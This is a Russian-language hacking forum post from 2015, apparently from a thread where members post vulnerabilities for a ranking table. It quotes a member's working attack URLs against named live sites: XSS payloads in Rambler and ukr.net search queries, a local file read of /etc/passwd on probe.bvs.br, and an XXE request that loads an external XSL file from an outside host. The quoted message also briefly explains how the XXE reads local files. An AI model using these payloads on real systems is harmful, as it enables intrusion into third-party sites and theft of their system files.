
31.07.2015, 15:01
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.
Сообщение от ocheretko
↑
Нашел на Рамблере XSS:
Код:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа
|
|
|